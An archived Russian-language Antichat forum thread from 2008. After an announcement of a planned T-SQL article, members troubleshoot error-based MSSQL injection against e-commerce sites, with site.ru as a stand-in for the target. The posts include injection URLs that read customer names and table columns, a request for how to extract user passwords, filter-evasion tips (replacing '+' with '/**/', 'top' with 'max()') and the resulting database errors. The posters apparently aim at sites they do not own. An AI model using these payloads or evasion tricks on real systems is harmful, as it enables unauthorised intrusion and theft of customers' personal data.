ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
10.01.2008, 08:02
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
Готовиться продолжение статьи
https://forum.antichat.ru/showpost.php?p=523825&postcount=36
TSQL, разделяй и властвуй.
В рассмотрении пока темы:
1) Эффективное исполнение команд.
2) Методы автоматизации иньекций.
3) MSSQL и PHP
4) Клиенты, библиотеки, и методы аудита баз MSSQL.
Хотелось бы услышать то, что вам будет интересно прочитать, обсудить или просто поделиться.
Все вы можете со мной обсудить на IRC канале #antichat.
|
|
|
08.02.2008, 05:24
|
|
Новичок
Регистрация: 24.01.2008
Сообщений: 20
Провел на форуме:
39650
Репутация:
15
|
|
Добрый день, столкнулся с траблой по MSSQL. Могу всмотреть таблицы и их колонки. НО не всех таблиц пример если взять ' customers'
Код:
site.ru/index.asp?loading=1%20or%201=(SELECT+TOP+1+last_name+from+customer)--
то читать могу выдает имя юзера, а вот если взять ' order'
Код:
site.ru/index.asp?loading=1%20or%201=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='order'+AND+COLUMN_NAME+NOT+IN+('ip','login_date'))--
показывает все, но если забить такой запрос
Код:
site.ru/index.asp?loading=1%20or%201=(SELECT+TOP+1+ip+from+order)--
то облом пишит следующие:
ADODB.Field error '80020009'
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/shop/progucts.asp, line 0
Что это может значить? Я так понимаю что у меня нету прав на чтения это таблицы или я ошибаюсь?
Последний раз редактировалось ~Taxa~; 08.02.2008 в 05:32..
|
|
|
|
08.02.2008, 07:14
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Просто нет походу ничего в этой табличке, т.е. запрос ничего не возвращает
__________________
Карфаген должен быть разрушен...
|
|
|
|
17.02.2008, 20:15
|
|
Новичок
Регистрация: 04.07.2007
Сообщений: 16
Провел на форуме:
109029
Репутация:
22
|
|
Вот с поvощью инъекции можно узнать логин пользователя, а можно ли его пасс узнать?
И еще как можно обойти вот такое:
Код:
Incorrect syntax near
Оно не дает использовать top, from, bcp, exec =( |
|
|
|
17.02.2008, 21:19
|
|
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028
Репутация:
2371
|
|
Кельт, фразу дальше мейби продлишь?
Неверный запрос ты составил вообще
Пароль можно вытащить если он в бд в незашифрованном виде...
|
|
|
|
17.02.2008, 21:32
|
|
Новичок
Регистрация: 04.07.2007
Сообщений: 16
Провел на форуме:
109029
Репутация:
22
|
|
Фразу я не продлил потому как она на все перечисленные ниже слова ругается, к примеру, на запрос вида:
or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES)--
вылетает ошибка:
Код:
Warning: mssql_query() [function.mssql-query]: message: Incorrect syntax near the keyword 'TOP'. (severity 15)
Warning: mssql_query() [function.mssql-query]: Query failed
Warning: mssql_fetch_assoc(): supplied argument is not a valid MS SQL-result resource
|
|
|
|
18.02.2008, 01:33
|
|
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028
Репутация:
2371
|
|
Ну правильно....плюсы замени например на /**/
|
|
|
|
18.02.2008, 01:49
|
|
Участник форума
Регистрация: 06.06.2006
Сообщений: 213
Провел на форуме:
1628290
Репутация:
474
|
|
>плюсы замени например на /**/
Mssql не поддерживает, если я не ошибаюсь, такой тип комментария
|
|
|
|
18.02.2008, 01:59
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от ENFIX
>плюсы замени например на /**/
Mssql не поддерживает, если я не ошибаюсь, такой тип комментария
Поддерживает, но обязательно что бы они были закрытыми, пробел так же можно заменить на /**/
2Кельт, иногда top фильтруется попробуй замени на max(table_name)
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 18.02.2008 в 02:02..
|
|
|
|
18.02.2008, 12:58
|
|
Новичок
Регистрация: 04.07.2007
Сообщений: 16
Провел на форуме:
109029
Репутация:
22
|
|
что-то не помогает =(
при замене + на /**/ выдает:
Warning: mssql_query() [function.mssql-query]: message: Incorrect syntax near '/'. (severity 15)
Warning: mssql_query() [function.mssql-query]: Query failed
Warning: mssql_fetch_assoc(): supplied argument is not a valid MS SQL-result resource
При использовании max(table_name) начинает ругаться на from:
Warning: mssql_query() [function.mssql-query]: message: Incorrect syntax near 'from'. (severity 15)
Warning: mssql_query() [function.mssql-query]: Query failed
Warning: mssql_fetch_assoc(): supplied argument is not a valid MS SQL-result resource
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид